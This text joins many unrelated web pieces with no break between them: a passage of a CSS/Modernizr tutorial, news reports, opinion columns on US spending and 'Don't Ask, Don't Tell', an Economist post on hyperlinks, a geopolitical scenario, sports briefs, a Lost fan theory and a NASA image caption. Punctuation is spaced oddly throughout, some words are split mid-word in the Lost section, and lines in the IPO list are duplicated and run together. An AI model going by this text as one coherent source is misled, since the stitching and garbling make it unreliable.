Of course , not every browser supports CSS columns yet , so for those browsers we ’ll just use floats to make the list two columns ; it ’ll no longer be alphabetically sorted ( visually ) , but it ’s better than nothing :
.csscolumns ol.features { - moz-column - count : 2 ; - webkit-columns : 2 ; -o-columns : 2 ; columns : 2 ; } .no-csscolumns ol. features { float : left ; margin : 0 0 20 px ; } . no-csscolumns ol. features li { float : left ; width : 180 px ; }
Again , I ’m using Modernizr to apply very common properties only under certain circumstances — something I could n’t do via property overloading or the cascade .
If the browser supports CSS columns , our work here is done : the list looks great and is still alphabetically ordered .
If the browser does n’t support CSS columns , as determined by the “ no-csscolumns ” class added to the < html > element in that scenario , we float our list items and apply some margins and widths to get a similar result .
It ’s not as good , but it ’s an improvement over one long , single - column list .
As you may have noticed , I ’m specifying my columns differently from the border - radius and box - shadow properties in the examples above .
That ’s because , for one , Opera only supports CSS columns via the vendor prefix at this time , and two , Mozilla does n’t recognize the “ columns ” shorthand property yet , hence the use of - moz - column - count for that browser .
With these and a couple of other , similar changes , our new page looks decidedly better .
Let ’s finish this tutorial by adding even more progressive enhancement to our page .
WebKit - based browsers support some pretty darn cool things — CSS transitions , animations , and three - dimensional transforms — and I want to show some of that off in our final step .
Again , some of these properties could simply be added to our existing CSS rules and get safely ignored by browsers that do n’t support them , but other properties would interfere with the layout in all browsers if I added them just like that , so I ’m using Modernizr to control very precisely when these enhancements are applied and when they are not .
First we set the stage :
@ -webkit - keyframes spin { 0 % { - webkit - transform : rotateY ( 0 ) ; } 100 % { - webkit - transform : rotate Y ( 360deg ) ; } } .csstransforms3d.cssanimations section { - webkit - perspective : 1000 ; }
The @keyframes rule is part of the new CSS animations specification , which , currently , only WebKit supports .
It allows you to declare a full animation path , with whichever properties you want , and change them at whichever steps you ’d like .
Note that you do n’t specify a duration in this declaration , only the key frames themselves — you specify things like the duration , loop count , and easing curves when you apply the animation in a CSS rule .
This allows you to re-use a particular animation at different speeds on different elements , and thus gives you the greatest flexibility .
For more information on using animations , see the W3C Working Draft specification .
Next , we apply our animation — which makes an element rotate around in 3D space — to our secondary header :
.csstransforms3d.cssanimations section h2 { background - image : url( modernizr - logo.png ) ; overflow : hidden ; - webkit- animation : spin 2s linear infinite ; }
Because we ’re now rotating in 3D space , I ’d like the background image of the Modernizr logo to look nice and anti-aliased , so I ’m replacing it with a PNG version .
I ’m also adding an overflow : hidden property to hide the original text in the header , which we were offsetting to - 9999 px .
Rotating the element in 3D made it show up during the rotation , which was amusing but did n’t look very nice .
Lastly , we apply the animation rule , set it to take two seconds , spin it in a linear fashion , and keep it going indefinitely .
Our final page looks great , and even has some fun animation going on in WebKit browsers .
I hope you now have a good understanding of how much more control you get over your websites with Modernizr , and how much easier it makes doing truly progressive enhancements .
That ’s not all that Modernizr is good for , though ; it ’s also invaluable for creating JavaScript - driven fallbacks and using cool new features from HTML5 — but that ’s a topic we ’ll have to discuss another time .
WE already harvest the power of the sun and the wind .
Soon we may also harvest the power of potholes .
A new type of shock absorber under development by the Levant Power Corporation converts the bumps and jolts of vehicles on rough roads into usable electricity .
Usually , shock absorbers dissipate the energy of bouncing vehicles as heat .
But the new shocks can use the kinetic energy of bounces to generate watts , putting the electricity to use running the vehicle ’s windshield wipers , fans or dashboard lights , for example .
The devices , called GenShocks , can be installed both in ordinary and hybrid vehicles , lowering fuel consumption by 1 to 6 percent , depending on the vehicle and road conditions , said Shakeel Avadhany , chief executive of the company , which is based in Cambridge , Mass .
Enlarge By Web Bryant , USA TODAY .
USA TODAY OPINION USA TODAY OPINION Columns
In addition to its own editorials , USA TODAY publishes a variety of opinions from outside writers .
On political and policy matters , we publish opinions from across the political spectrum .
Roughly half of our columns come from our Board of Contributors , a group whose interests range from education to religion to sports to the economy .
Their charge is to chronicle American culture by telling the stories , large and small , that collectively make us what we are .
We also publish weekly columns by Al Neuharth , USA TODAY 's founder , and DeWayne Wickham , who writes primarily on matters of race but on other subjects as well .
That leaves plenty of room for other views from across the nation by well - known and lesser - known names alike .
Contributors Board
How to submit a column
The flames from Greece 's debt crisis protests have cast new light on the perils of our own overspending and overborrowing .
You know the litany .
California is imploding .
Public sector unions there , and across the country , are swallowing budgets .
In California alone , pension costs have gone up 2,000 % in a decade .
At the national level , ObamaCare has done little to fix — and much to hurt — America 's long - term entitlement mess .
Already , the structural deficit has tripled since 2007 .
Economist Price Fishback has just published a paper finding that America spends more on social welfare than socialist Sweden ( though we spend it differently ) .
Meanwhile , this newspaper recently reported that " paychecks from private business shrank to their smallest share of personal income in U.S. history during the first quarter of this year , " while government benefits rose to a record high .
In fact , government employment is becoming a method of redistributing wealth .
In 2009 , the federal payroll grew and the number of federal jobs paying over $ 100,000 a year doubled .
Since the recession began , the private sector cut 8.5 million jobs ( more than 7 % of the workforce ) while local governments cut 141,000 ( less than 1 % ) .
Moreover , the average federal worker earns over 70 % more than the average private sector worker , writes Arthur Brooks in his new book The Battle : " To find this acceptable , you must agree that the average federal worker is much more productive or deserving than the average person in the private sector . "
More , please Yet the Democrats want more .
More what ?
More everything .
Even as the economy is starting to grow and many experts think we should trim debt and spending , Democrats want another stimulus bill , to extend jobless benefits .
( They call them " jobs bills " now . )
It turns out that all of that talk of a " temporary " stimulus was just that : temporary talk .
Indeed , the mess we have today is merely the natural result of a century - long battle over the size of government .
When it comes to the welfare state , liberals want more , conservatives want less .
It seems that nobody ever talks about " enough . "
Except that 's not entirely true .
Rep. Paul Ryan , R - Wis. , offered an alternative vision of government in his famous " Roadmap . "
It was , in the words of New York Times columnist Ross Douthat , a blueprint for a " conservative welfare state . "
The idea was that the truly needy would be taken care of because they are truly needy , but that middle - class entitlements would be scaled back for two simple reasons : 1 ) we cannot afford them , and 2 ) excessive government meddling in areas such as health care increases costs and wastes money .
Ryan 's blueprint was denounced by liberals as too stingy and largely ignored by much of the Republican leadership , who were happy to just say " No " to Obama 's plans without offering voters anything serious to say yes to .
William Voegeli , a scholar of impeccable conservative credentials , has joined Ryan 's battle in his book Never Enough , a searing indictment of what he calls the Hundred Years '
War between the party of more and the party of less .
Voegeli argues that American voters ( including most Republicans ) will never fully eradicate the welfare state because they do n't want to .
And so conservatives should make peace with the idea that the federal government should help the truly needy , while rejecting both the sorts of middle - and upper - class entitlements that are bankrupting the country and the kind of government " dole " that breeds bad habits among the poor and able - bodied .
Time for a new strategy Purist libertarians who see merely a surrender to liberalism should at least acknowledge that liberals would denounce any suggestion of means testing America 's safety net ( as will many voters ) .
Moreover , the current strategy has witnessed a century of nearly uninterrupted growth in the welfare state , even under Ronald Reagan .
That alone recommends a new strategy .
Consider Social Security .
Liberals are absolutely committed to the idea that everybody should be in the same creaky retirement system .
They insist that middle - and upper - class voters must be bribed to support the poor .
So Warren Buffett gets a Social Security check to ensure everyone does .
In fairness , some liberals also claim that a universal entitlement binds us together as a nation .
The former claim is cynical , the latter poetic nonsense .
Governments do not generate wealth ; they can merely distribute it .
The challenge for both liberals and conservatives is simply to define how much distribution is " enough . "
What would an acceptable safety net look like ?
Who should be taken care of by taxpayers and for how long ?
Paul Ryan offered an answer to that question , and liberals scoffed because they reject the question .
There 's no such thing as enough .
That 's what the Greeks thought .
Jonah Goldberg , a member of USA TODAY 's Board of Contributors , is a visiting fellow at the American Enterprise Institute .
Guidelines :
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
You share in the USA TODAY community , so please keep your comments smart and civil .
Do n't attack other readers personally , and keep your language decent .
Use the " Report Abuse " button to make a difference .
Read more
IT SEEMS like a curious question to ask : should links be deliberately excluded from online articles , essays and blog posts ?
The link , after all , is the very currency of the web .
But that is the question Nicholas Carr poses in an intriguing blog post .
Needless to say , his post does not contain links , at least not in the main text ; instead they are listed at the end , like footnotes .
Why ?
Because , Mr Carr argues , links lead us astray :
Links are wonderful conveniences , as we all know ( from clicking on them compulsively day in and day out ) .
But they 're also distractions .
Sometimes , they 're big distractions - we click on a link , then another , then another , and pretty soon we 've forgotten what we 'd started out to do or to read .
Other times , they 're tiny distractions , little textual gnats buzzing around your head .
Even if you do n't click on a link , your eyes notice it , and your frontal cortex has to fire up a bunch of neurons to decide whether to click or not .
You may not notice the little extra cognitive load placed on your brain , but it 's there and it matters .
People who read hypertext comprehend and learn less , studies show , than those who read the same material in printed form .
The more links in a piece of writing , the bigger the hit on comprehension .
This is part of Mr Carr 's broader argument , detailed in his new book " The Shallows " , about how the internet is changing the way people think .
The hyperlink , he says , is " just one element among many — including multimedia , interruptions , multitasking , jerky eye movements , divided attention , extraneous decision making , even social anxiety — that tend to promote hurried , distracted , and superficial thinking online . "
Laura Miller , who reviewed the book at Salon , took Mr Carr 's words to heart and put hyperlinks at the bottom , inspiring Mr Carr to do the same .
And in a similar vein , he notes , a blog published by the National Core for Neuroethics at the University of British Columbia is carrying out an experiment in which hyperlinks will be excluded from the text blog posts , and listed at the end instead .
The bloggers in question have for their part been inspired by the writing of Olivia Judson , formerly of this parish , at the New York Times ; she also lists her hyperlinks at the end , rather like the references in a scientific paper .
Mr Carr 's suggestion that this is not a bad idea has prompted responses from several web gurus : Jay Rosen at NYU has accused him of wanting to " unbuild the web " ; Jeff Jarvis claims that Mr Carr 's post is , ironically , linkbait ( insert joke about pots , kettles and the colour black here ) ; and Mathew Ingram gives a robust defence of the link :
I think not including links ( which a surprising number of web writers still do n't ) is in many cases a sign of intellectual cowardice .
What it says is that the writer is unprepared to have his or her ideas tested by comparing them to anyone else 's , and is hoping that no one will notice .
In other cases , it 's a sign of intellectual arrogance — a sign that the writer believes these ideas sprang fully formed from his or her brain , like Athena from Zeus 's forehead , and have no link to anything that another person might have thought or written .
Either way , getting rid of links is a failure on the writer 's part .
Fair enough .
But I have to confess that I have some sympathy for Mr Carr 's view .
I do n't mind piles of links in sidebars , but I find links in text can be irritating if there are too many of them .
Of course , it makes sense to link to sources , but links also invite the reader to go away and read something else , and they can imply that the item you are reading can only be understood by reading all the references .
At The Economist we do our best to write articles that are self - contained and make sense without the need to refer to other sources , which leads to some characteristic Economist style quirks , such as saying " Ford , a carmaker " .
( See ?
We saved you the trouble of having to ask Google what the company does . )
When those articles are published online , there are very rarely hyperlinks in the body of the text .
Admittedly , the advent of browsers with tabs means a link is less of an invitation to go elsewhere than it used to be , because you can open up lots of background tabs while you read without interruption .
But I wonder what proportion of the web population actually does this .
Anyway , having chortled ( via Twitter ) at Ms Miller 's idea of a list of links , footnote - like , at the end of the article , I feel the least I can do is give it a try .
So here are the links .
What do you think ?
Is this approach less distracting ?
Should we include more links in the text of our articles ?
Are we being arrogant , or cowardly , by not doing so ?
Nick Carr 's post on " delinkification "
Laura Miller 's review of " The Shallows "
Mathew Ingram defends linking
All at sea in Antigua , one of the last winter sun options for Britons
In addition to the 20 - odd patents that Apple is suing HTC for infringing , there ’s one more that Apple has added this week to their Delaware lawsuit : “ System for real - time adaptation to changes in display configuration ” , which is described as :
A hot - plugging capability for video devices is achieved by shifting the responsibility for recognizing changes in the configuration of a display environment from a computer ’s operating system to a device manager .
When an input / output device is added to or removed from the computer system , an interrupt signal informs a device manager of the fact that a change in configuration has occurred .
In response thereto , the device manager determines whether the changed component relates to the computer ’s display function .
If so , the device manager makes a call to the computer ’s display manager , to inform it of the fact that the display configuration has changed .
In response to this call , the display manager reconfigures the display space for the computer system and notifies clients as appropriate , to accommodate display features associated with the added component .
With this change in the configuration of the display space , the added component becomes immediately available for use .
Maybe it all gets just too complicated .
Too many things go wrong at the same time .
The capacity of the world ’s leaders and institutions to respond in a coherent and authoritative way on several huge problems at the same time ebbs away .
This opens the way for calculated lunges by different regional powers , aiming quickly to establish some new facts on the ground while attentions are distracted elsewhere .
Imagine some sort of geo-political storm featuring , among others :
escalating tensions between Turkey and Israel , with Arab countries and Iran weighing in opportunistically to arm Hamas and drive up a sense of inevitable confrontation .
Israel ’s very existence is openly challenged in numerous capitals
South and North Korea relations decline amidst mutual recriminations over various off - shore naval incidents
the European Union ’s legal authority is hammered by rulings in the German courts declaring unconstitutional the various attempts by Brussels to underpin the Eurozone by side - stepping existing EU treaties
the Eurozone crisis quickly enters a new phase , with civil unrest breaking out in Greece and financial markets seizing up in other European capitals .
Cash machines across much of Europe run dry ; just - in - time supplies of food to Europe ’s supermarkets falter
ethnic clashes break out in several southern European countries , including some within the European Union ( Slovakia , Hungary , Romania ) and in Serbia / Kosovo and Bosnia
Europe ’s leaders run out of intelligent joint responses to these simultaneous crises – the European Union itself looks vulnerable to abrupt disintegration , as France and Germany bluntly disagree over what needs to be done merely to keep the show on the road
the financial crisis in Europe spreads to Russia , causing numerous banks to fail .
Various parts of Russia proclaim a new autonomy , defying Moscow ’s authority .
Road - blocks start to appear on many internal borders .
Attempts by Moscow to crush opposition in the regions backfire , causing widespread violent demonstrations against Putin ’s rule
NATO forces in Afghanistan and US forces in Iraq suffer heavy losses in a series of terrorist suicide bombings , giving the impression that the USA is being driven back
Christian / Muslim communal fighting in Nigeria spills beyond Nigeria ’s borders
the BP oil leak suddenly gets worse again
Israel warns that it will use every possible means to defend itself , and bombs a number of suspected Iranian nuclear bomb installations
Turkey announces that it will use military force to ‘ blockade ’ Israel and its airspace .
the Obama administration cannot react coherently to any of this , above all the soaring tensions in the Middle East .
Washington dare not try to rein in Turkey and / or Israel , lest one or other or both simply ignores the pressure …
The UN is powerless – the five Security Council permanent members are overwhelmed with internal and external dramas
It is not so much that any one of these problems is uncontainable .
It is the fact that they come along simultaneously , creating a sense that the shared understandings and responsibilities which have kept some sense of global order since WW2 are giving way to a new ‘ grab what you can ’ attitude .
Western policy - makers in particular are paralysed , bogged down in their economic problems and unwilling to use military force since it is no longer clear ( a ) that Western military force can achieve victory in the sort of conflicts now breaking out in different places , and ( b ) what a stable outcome in any one place might look like .
Western hesitation is matched by Chinese , Russian and Indian hesitation .
Those powers themselves are struggling as world markets seize up , but they see an historic opportunity for themselves to move into the philosophical space created by Western retreat .
World Wars One and Two were conflicts with global reach arising from European power - struggles .
But there was at least a clear context , involving thematic rivalries in an understandable form .
World War
Three is different .
For the first time in centuries the USA and Europe are unable to set or even define the global agenda , and so face philosophical and psychological defeat .
Other powers come to the fore , fighting and redrawing the map – and therefore the rules – as they see fit .
The turmoil is all the more dramatic and vicious for being in a sense anarchic and incoherent , even if civilisational principles are implicitly at stake .
Or maybe it will all be fine .
BP stop the leaking oil .
Turkey and Israel meet for a quiet drink and sort out their differences .
Brussels ’ efforts to reform the Eurozone are seen to be brilliantly successful , and prompt even deeper happy integration among all EU members .
England win the World Cup , Jermain Defoe scoring a brilliant solo winner .
Nine Minnesotans are among the 44 players chosen by USA Hockey to participate in the national junior evaluation camp in Lake Placid , N.Y. , in early August .
The tryouts will be used to pick most of the U.S. team for the World Championships from Dec. 26 to Jan. 5 in Buffalo , N.Y .
The Minnesotans are : goalie Zane Gothberg ( Thief River Falls ) ; defensemen Mark Alt ( Cretin - Derham Hall ) , Justin Faulk ( South St. Paul ) , Derek Forbort ( Duluth ) and Nick Leddy ( Eden Prairie ) ; and forwards Nick Bjugstad ( Blaine ) , Zach Budish ( Edina ) , Brock Nelson ( Warroad ) and Tyler Pitlick ( Centerville ) .
The United States will be the defending gold medalist at the world championships .
The Cannon Falls Road Race , the third stage of the Nature Valley Grand Prix bicycle series , was called off Thursday night .
The 66 - mile men's race started at 5 p.m. , but as the women 's division reported for a 5:30 start , weather reports forced race officials to get all bikers to safety .
It 's the first cancellation in the race 's 12 - year history .
" We 're always at the whim of Mother Nature , " race executive director David LaPorte said .
" It 's unfortunate to have to call a race that these 200 - plus men and women cyclists have prepared for , but we err on the side of safety for the riders at all times . "
Stage 4 is Friday night in Uptown Minneapolis .
Ely Allen scored in the 20th minute and Joe Warren got the shutout in goal as the NSC Minnesota Stars defeated the Portland Timbers 1 - 0 in Portland , Ore .
STAFF , NEWS SERVICES
NATURE VALLEY BICYCLE FESTIVAL
TODAY : STAGE 4
Uptown Minneapolis Criterium
What : 1 - kilometer course featuring six 90 - degree turns
When : Women 6:15 p.m. , men 7:45 p.m .
Start / finish : Hennepin Avenue and 31st Street
VANCOUVER , Canada – World labor leaders gathered here in the second congress of the International Trade Union Confederation are of one mind in rejecting the “ Washington consensus ” that calls for deregulation of banks and financial markets .
In his opening address , Guy Ryder , the outgoing ITUC general secretary , called for an end to the “ dictatorship of the finance - atariate . ”
He said it is the people ’s time to fight for “ fundamental change in globalization . ”
The delegates amplified Ryders message in their remarks , and in one voice declared that decent jobs is the only real answer to the economic crisis .
Overwhelmingly the delegates called for financial transaction taxes to pay for jobs and economic recovery .
AFL - CIO President Richard Trumka , speaking from the U.S. delegation , called for bold action for a “ new economic order . ”
Citing the violent government attacks and repression against the Mexican miners ’ union in Cananea , Trumka said the new order must include strong labor and human rights .
He said collective bargaining and the right to organize are cornerstones of real democracy in a new economic order .
A highlight of the congress so far was an address by a young hotel worker from Vancouver .
She spoke about workers ’ struggle for a new contract with some of the biggest hotel chains in the world like Hyatt and Four Seasons .
She said these hotels in Vancouver are recovering from the economic crisis and the rooms are full .
And still , she said , they are cutting staff , increasing workloads and demanding concessions even as they make big profits .
Many delegates raised the need to fight for the unemployed and jobs at the same time as global labor puts forward the demand for stock transaction taxes and re-regulation of the financial markets .
Many also pointed out that a crisis of poverty , hunger and homelessness was rampant throughout the developing world long before the financial market meltdown and the Great Recession .
Like many of the delegates , A. Santos of Brazil argued that the crisis shows the failure of the neo-liberal model , with its deregulation , wild speculation and attacks on labor and human rights .
He called for a new economic model that will put people back to work with decent jobs and income , that will provide a strong role for the state in regulating and controlling finance capital and tackle sustainable economic development to end poverty , hunger and homelessness .
J. Smit of the Netherlands echoed the call of many delegates for fundamental change in globalization .
The current system does n’t work and the “ invisible hand ” of the market is dead , he said .
Just as feudalism has failed so this system has to be discarded , Smit said .
He called for a new system that provides social security , labor rights , a strong public sector , strong services , and strong banking controls .
We need a sustainable green system , he said .
Several delegates joined with A. Jerad of Tunisia in calling for peace as central to a new economic model .
In particular Jerad called for an end to the blockade of Gaza and for an independent Palestinian state .
Others called for ending the wars in Iraq and Afghanistan .
This echoed Ryder ’s statement that “ our world is not just and not at peace . ”
Ryder said wars “ are a blight ” on progress and that trade unionists must fight to end them .
Delegates also called for special attention to the impact of the crisis on women and young workers .
Many spoke of the terrible conditions faced by women in the informal economy and in export zones around the world .
And they called for special efforts to bring women into unions and into union leadership .
S. Andersson of Sweden spoke of the work of the ITUC ’s youth committee .
She told how young workers are using social networks and new technology to bring young people into the labor movement .
She outlined some of the special problems facing young workers including being forced into temporary work with no rights , where they are often cheated out of wages .
She said the ITUC must become a loud voice for young workers .
Also much attention was given by delegates to green development and sustainability .
They heartily agreed with Ryder when he said , “ The road to global justice must be a green road .
Green development and protecting the environment cannot be put off to after the crisis . ”
Throughout the discussion it was clear that a new fighting spirit is emerging in global labor .
With all the calls for action from the congress came also a realization that labor must form bigger and stronger coalitions to take on finance capital globally .
As one delegate put it , “ If we are united , if we reach out to all of labor and all of the people , we can push back just as hard as the banks and the multinational corporations try to push us . ”
Photo : Inuit throat - singers welcome delegates to the second congress of the ITUC in Vancouver .
( PW / Scott Marshall )
Image caption New premier Choe Yong -rim is Pyongyang 's party chief
North Korea has reshuffled its top leadership at a rare second session of its parliament , state media says .
Top leader Kim Jong - il attended the session , KCNA news agency said , after missing the previous one on 9 April .
Choe Yong - rim replaced Kim Yong-il as premier - the official responsible for the communist state 's economic policy .
State media also said that Mr Kim 's brother - in - law , Chang Song - taek , was promoted to a powerful military post on the National Defence Commission .
Mr Chang is thought to be a backer of a hereditary succession involving Mr Kim 's youngest son , Kim Jong-un .
Succession hint ?
The 687 - member parliament - known as the Supreme People 's Assembly - usually meets just once a year .
The special session of parliament , announced on 18 May , was called to discuss " organisational matters " , KCNA said .
Choe Yong -rim , the Pyongyang party chief , was reportedly proposed as premier by the political bureau of the party 's Central Committee .
Some reports linked the replacement of the premier to last year 's failed currency revaluation .
Mr Chang 's promotion came " at the proposal of Kim Jong - il " , the agency said .
The NDC is North Korea 's highest military body and Mr Chang - already a member - now becomes a vice - chairman .
Mr Chang has been described as one of Mr Kim 's most trusted allies .
Some reports said he had overseen affairs while Mr Kim was incapacitated after a stroke in 2008 .
His promotion will be seen by some as a sign that Mr Kim is putting key personnel in place to ensure a smooth transition of power to his son .
Three ministers - of light industry , foodstuffs and physical culture - were replaced , and six new vice - premiers appointed .
The reshuffle comes with inter-Korean ties in tatters , following the sinking of a South Korean warship .
Forty - six sailors were killed when the Cheonan went down on 26 March near the disputed inter-Korean border .
International investigators say a torpedo fired from a North Korean submarine sank the ship - something Pyongyang rejects .
It has called Seoul 's decision to refer the issue to the UN Security Council " intolerable " .
Rap on the knuckles for Cherie from top judge
Cherie Blair has suffered the humiliation of a secret dressing down from a top judge after sparing a Muslim criminal from jail because he was ' religious ' , it emerged last night .
The revelation has given rise to accusations of a cover - up by the Office for Judicial Complaints - because it originally issued a statement claiming Mrs Blair had been cleared of wrongdoing while sitting as a judge .
The secret tribunal claimed last week that an investigation found her decision to give a lenient punishment to Shamso Miah did not amount to misconduct .
Humiliation : Mrs Blair will receive ' informal advice from a senior judge '
However , yesterday it emerged that a complaint by the National Secular Society that religious belief should not earn a convict a lighter sentence had actually been ' partially substantiated ' and Mrs Blair will receive ' informal advice ' .
The former prime minister 's wife was sitting as a part - time judge at Inner London Crown Court in January when she gave Miah , 25 , a suspended six - month jail sentence after he pleaded guilty to assault .
Despite Miah admitting breaking a complete stranger 's jaw in a bank queue brawl , Mrs Blair refused to send him to jail , claiming : ' You are a religious man and you know this is not acceptable behaviour . '
Last week , the Office for Judicial Complaints said ' no disciplinary action was necessary ' even though Mrs Blair had flouted an Appeal Court ruling that no religious belief should have special protection in law .
Last night a letter emerged revealing that Mrs Blair - who sits under her maiden name Booth - would not be formally disciplined .
But it admitted she would receive ' informal advice from a senior judge ' - an embarrassing rap across the knuckles .
The letter said that Lord Chancellor Ken Clarke and the Lord Chief Justice Igor Judge had expressed ' some concern about the impact [ of the comments ] on the public perception of the judiciary and the sentencing process .
' All judges must , of course , be very mindful of how they express themselves when dealing with sensitive issues of equality and diversity - including religion , race and sex - so as not to create the impression that some individuals can expect more leniency than others . '
It added : ' They have agreed , however , that Recorder Booth should receive informal advice from a senior judge about the comments she made in this particular case , but that is not a formal disciplinary sanction . '
Keith Porteous Wood , executive director of the National Secular Society , said : ' This has the feeling of a cover - up .
Why did the OJC put out such a partial and misleading statement about this case ?
' Why did n't it make clear that there were concerns about Recorder Booth 's comments ?
Then it tried to silence the complainants by heading its letter to the NSS as " Restricted " .
' We welcome them stating their concern that remarks should not be made in court that could be thought to imply that defendants should be treated differently because of their religion or belief .
' This is a timely reiteration of the fundamental of justice that everyone should be treated equally by the courts whatever their religion , or lack of it . '
Quotation Details
Quotation # 24429 from Classic Quotes :
There is always something new out of Africa .
Pliny the Elder , Natural History
Roman scholar & scientist ( 23 AD - 79 AD )
Your Quotations Page
You must be a registered user to use this feature .
Log in using the form to the left , or register as a new user .
You must be a registered user to use this feature .
Log in using the form to the left , or register as a new user .
Senility comes to mind .
Ike Skelton , the 78 year old chairman of the House Armed Services Committee , opposes repealing “ Do n’t Ask , Do n’t Tell ” in part because if we change the military ’s personnel policy , it might result in 7 - year - olds hearing about gays in the news .
So let ’s get this straight , as it were .
The chairman of the House Armed Services Committee makes national defense policy based on the preferred dinner conversation of second graders .
That ’s pretty pathetic .
It ’s also pretty homophobic and bigoted , in addition to a tad demented .
But this goes beyond Skelton being a bit too old , and too bigoted , to have such an important committee chair .
Skelton is the man who joined forces with Secretary Gates to screw President Obama two months on DADT .
Skelton asked Gates for a letter saying that Gates did n’t want Congress to do anything on DADT this year .
They did this in order to undercut the President .
And sadly , we ’re not done with Skelton yet .
If the DADT compromise ( weak as it is ) passes the Senate some time over the next month , it will then need to be conferenced .
In that conference , four men will be making the decision as to what to do with DADT : Levin & McCain ( Senate Armed Services ) , and Skelton and McKeon ( House Armed Services ) .
The only one who is n’t an avowed homophobe is Levin .
Skelton will continue to wreak havoc in our lives unless and until he ’s unseated in the fall , or Speaker Pelosi tells him to cut the crap .
MOSCOW , June 5 ( Reuters ) - Russian President Dmitry Medvedev called on the world ’s leading economic powers on Saturday to consider creating a fund to insure against large - scale environmental disasters like the Gulf of Mexico oil spill .
“ Perhaps we should consider setting up a global fund for insuring or re-insuring against these sorts of ( environmental ) risks , ” the president wrote in his official Kremlin blog .
Medvedev said he expected to raise the issue at a G20 summit in Canada later this month .
Russia , the world 's leading oil producer , has paid close attention to BP 's BP.L reaction to the Gulf spill , in part because 25 percent of the British energy giant 's global output comes from its Moscow - based TNK - BP TNBPI .RTS joint venture .
Deputy Prime Minister Igor Sechin on Saturday said Russia would introduce stricter safety requirements for oil producers as a result of the Gulf spill , now considered the largest environmental disaster in U.S. history .
[ ID : nLDE65401Z ]
Medvedev also called for the creation of a new legal framework to deal with such large - scale disasters .
“ We need to put in place a modern framework of international law in this area , perhaps in the form of a convention or several agreements that will address issues of the kind arising from disasters such as that in the Gulf of Mexico , ” he wrote .
Leaders from the Group of 20 wealthy and developing nations are scheduled to meet in Toronto on June 25 and 26 .
Join us as we take a peek inside at Apple 's newest revision of the Mac Mini , now with an HDMI port !
Check out the YouTube video slideshow of the teardown as well !
because in order to complete the circle of life , the new protector will have to actually destroy the MIB .
Essentially , Jacob knows that the MIB will eventually ﬁnd a way to kill him , but that whoever replaces him will also have to kill the MIB .
This is no easy feet due to him no longer have a corporeal form .
Thus , the need for so many candidates to begin with .
With this cycle , it 's not just as simple as guarding the source .
Since both Jacob and MIB are bound to the source , they both need someone to unplug it , as they cannot .
However , the MIB needs someone to do it so he can leave , whereas Jacob needs someone to do it so that they can kill the MIB and complete the cycle .
The reason Jacob puts so many of the candidates through hell , is to prepare them for what they have to do .
Meanwhile , MIB is manipulating them to destroy one another and the island .
The dharma initiat ive nicknames the smoke m onster cerberus .
Cerberus was the guard of Hades .
Usually , the protector is both the sides of the equation , but due to the dichotomy between the two , the MIB becomes the incarnation of only one part .
No one has all the answers
One of the running themes of the show is faith versus science .
I believe that no one really has the answe rs .
Jacob does n't reall y know what the source i s anymore than he explained .
The MIB does n't exactly know how to get off the island or what will happen when you pull out the cork .
Both characters know m ore than the Oceani c 815 survivors , but are also in the dark about many things .
They are acting on faith and basically guessing .
They just understand that l ight is the source of the struggle .
Time Travel , Moving the Island , and why people can't have babies .
Spiral Galaxy NGC 6744 June 4 , 2010 - A Sibling of the Milky Way
This image of spiral galaxy NGC 6744 from NASA ’s WISE ( Wide - field Infrared Survey Explorer ) is a mosaic of frames covering an area 3 full Moons tall and 3 full Moons wide ( 1.56 x 1.56 degrees ) .
It is located in a constellation in the Southern sky , Pavo , whose name is Latin for peacock .
There are relatively few large spiral galaxies in the local Universe ( within about 40 million light - years of the Local Group of galaxies ) .
At a distance from our Solar System of about 30 million light - years , NGC 6744 is one of the galaxies in the local Universe most like the Milky Way .
So if there are observers somewhere in this sibling galaxy looking back at the Milky Way they might see a very similar image .
Its disk is about 175,000 light - years across , larger than the Milky Way Galaxy .
So it is kind of like a big brother of the Milky Way .
It has an elongated ( barred ) core and distinct spiral arms .
The spiral arms of the disk are the sites of star formation within the galaxy and are very dusty .
Dust and star formation go together hand - in - hand .
Dust in star forming regions is relatively warm ( temperatures of hundreds of Kelvins ) and shows up as green and red in this infrared image from WISE .
Throughout the disk and core are many , many older generations of stars whose temperatures are in the thousands of Kelvins .
These stars are color - coded blue and cyan in this image .
This image was made from observations by all four infrared detectors aboard WISE .
Blue and cyan represent infrared light at wavelengths of 3.4 and 4.6 microns , which is primarily light from stars .
Green and red represent light at 12 and 22 microns , which is primarily emission from warm dust .
Image Credit : NASA / JPL - Caltech / WISE
Team
This could be the funniest Funny or Die video in recent memory .
Below , the trailer for Wax On , F*ck Off , the documentary about Ralph Macchio ’s journey to finally become a Hollywood bad boy .
I knew it was going to be special the second Molly Ringwald cameo’d .
No other spoilers .
Just watch it below .
The IPO market fell apart this week , they 've been canceling all over .
We 've counted ten so far :
Monday :
Giti Tire --
China 's largest tire maker , canceled / postponed Monday
Tuesday :
Tian Yuan Mining Ltd. --
Chinese iron ore producer , canceled / postponed Tuesday
Chinese iron ore producer canceled / postponed Tuesday New Century Shipbuilding -- Chinese shipbuilder , canceled / postponed Tuesday
Wednesday :
GSW -- Berlin based real estate company , canceled / postponed Wednesday
Thursday :
Americold Realty Trust --
Real estate investment trust , canceled / postponed Thursday
Real estate investment trust canceled / postponed Thursday Swire Pacific -- Hong Kong conglomerate , canceled / postponed Thursday
Hong Kong conglomerate , canceled / postponed Thursday Smile Brands Group -- Support services for U.S. dentists , canceled / postponed Thursday
Support services for U.S. dentists , canceled / postponed Thursday Telegent Systems -- U.S. mobile T.V. chip vendor , canceled / postponed Thursday
Friday :
Ryerson Holdings -- U.S. metals processor , canceled / postponed Friday
-- U.S. metals processor , canceled / postponed Friday MIE Holdings --
Chinese oil exploration and production company , deal officially still happening but said to be questionable now .
It looks like IPOs are suddenly finding that they can't get the investor demand / valuations they thought they could achieve from the market not too long ago .
Major League Baseball is considering seizing ownership of the Texas Rangers in an attempt to finalize a deal to sell the club to the group headed by Pittsburgh attorney Chuck Greenberg and club president Nolan Ryan , a source familiar with the negotiations told ESPNDallas.com on Monday .
The Sports Business Journal , citing several sources , first reported Monday that the league could take control of the team under the " best interests of baseball " rule and sell the group to Rangers Baseball Express to avoid creditors blocking the agreement .
That could provoke the creditors to take legal action , which might include an involuntary bankruptcy petition .
Hicks Sports Group was forced to sell majority stake in the club after defaulting on a $ 525 million loan early last year .
Major League Baseball eventually had to step in and infuse some money into the club .
